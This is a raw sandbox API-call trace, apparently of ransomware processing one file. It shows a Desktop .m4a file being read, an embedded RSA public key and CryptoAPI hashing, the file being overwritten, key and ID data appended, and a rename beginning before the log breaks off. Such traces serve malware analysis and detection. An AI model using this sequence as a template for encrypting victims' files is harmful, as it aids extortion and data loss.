PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kcmGQ10PrrBAp.m4a") returned=".m4a" [0203.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kcmGQ10PrrBAp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kcmgq10prrbap.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.706] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=6852) returned 1 [0203.706] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.708] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1a9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.708] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.710] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1ac4, lpOverlapped=0x0) returned 1 [0203.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.710] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.711] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.711] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.711] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.711] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.711] GetLastError () returned 0x0 [0203.711] SetLastError (dwErrCode=0x0) [0203.711] GetLastError () returned 0x0 [0203.711] SetLastError (dwErrCode=0x0) [0203.711] GetLastError () returned 0x0 [0203.711] SetLastError (dwErrCode=0x0) [0203.712] GetLastError () returned 0x0 [0203.712] SetLastError (dwErrCode=0x0) [0203.712] GetLastError () returned 0x0 [0203.712] SetLastError (dwErrCode=0x0) [0203.712] GetLastError () returned 0x0 [0203.712] SetLastError (dwErrCode=0x0) [0203.712] GetLastError () returned 0x0 [0203.712] SetLastError (dwErrCode=0x0) [0203.712] GetLastError () returned 0x0 [0203.712] SetLastError (dwErrCode=0x0) [0203.712] GetLastError () returned 0x0 [0203.712] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.712] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.712] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.712] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.712] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1ac0) returned 0x3b6eb68 [0203.712] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dc58 [0203.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dca0 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.713] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b70630 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fddd0 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70630 | out: hHeap=0x2c0000) returned 1 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdd58 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdd40 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68190 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b682a8 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fddd0 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.714] GetCurrentThreadId () returned 0x600 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323700 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.714] GetCurrentThreadId () returned 0x600 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0203.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0203.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fddd0 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68190 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b683c0 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0203.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd70 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6dca0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.717] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb68*, nNumberOfBytesToWrite=0x1abf, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb68*, lpNumberOfBytesWritten=0x39cfb14*=0x1abf, lpOverlapped=0x0) returned 1 [0203.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.718] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1ac4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.718] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0203.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0203.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b6eb68 [0203.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0203.718] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.718] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.718] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.718] CloseHandle (hObject=0x63c) returned 1 [0203.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b6eb68 [0203.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.719] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS 